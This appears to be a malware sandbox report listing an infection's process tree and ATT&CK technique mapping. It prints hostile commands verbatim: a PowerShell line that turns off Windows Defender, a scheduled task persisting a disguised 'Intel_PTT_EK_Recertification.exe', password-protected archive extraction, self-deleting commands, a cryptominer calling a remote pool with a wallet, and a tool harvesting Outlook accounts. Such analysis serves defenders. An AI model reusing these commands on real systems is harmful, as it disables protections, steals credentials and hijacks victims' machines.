- - C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
    "C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:6020
  - - C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
      "C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4816
    - - C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
        
        C:\Users\Admin\AppData\Local\complacence\outvaunts.exe /stext "C:\Users\Admin\AppData\Local\Temp\cfvjjkn"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6956
    - - C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
        
        C:\Users\Admin\AppData\Local\complacence\outvaunts.exe /stext "C:\Users\Admin\AppData\Local\Temp\mhickcylzb"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:3216
    - - C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
        
        C:\Users\Admin\AppData\Local\complacence\outvaunts.exe /stext "C:\Users\Admin\AppData\Local\Temp\xboulvinnjbmv"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5516
- - C:\Users\Admin\AppData\Local\Temp\a\profile1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\profile1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\a\profile1.exe
      C:\Users\Admin\AppData\Local\Temp\a\profile1.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1032
  - - C:\Users\Admin\AppData\Local\Temp\a\profile1.exe
      C:\Users\Admin\AppData\Local\Temp\a\profile1.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5600
- - C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
    "C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      PID:5344
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:6952
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p24291711423417250691697322505 -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:536
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:6812
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:6900
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5712
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2820
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6428
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:804
    - - C:\Windows\system32\attrib.exe
        
        attrib +H "in.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3528
    - - C:\Users\Admin\AppData\Local\Temp\main\in.exe
        
        "in.exe"
        5⤵
        Executes dropped EXE
        
        PID:2032
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:5464
      - C:\Windows\SYSTEM32\attrib.exe
        
        attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
        6⤵
        Views/modifies file attributes
        
        PID:4400
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6044
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell ping 127.0.0.1; del in.exe
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5824
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2528
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 94.156.167.42:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
    3⤵
    - Suspicious use of FindShellTrayWindow
    PID:6276
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 6368 -ip 6368
1⤵
PID:5888

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:6920
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:6600
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5292
- - C:\Windows\SysWOW64\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1532
- - C:\Windows\SysWOW64\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4804
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4112 -ip 4112
1⤵
PID:6828

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2388
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:920
- - C:\Windows\system32\PING.EXE
    "C:\Windows\system32\PING.EXE" 127.1.10.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5228

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3200
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:6040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1968
- - C:\Windows\system32\PING.EXE
    "C:\Windows\system32\PING.EXE" 127.1.10.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion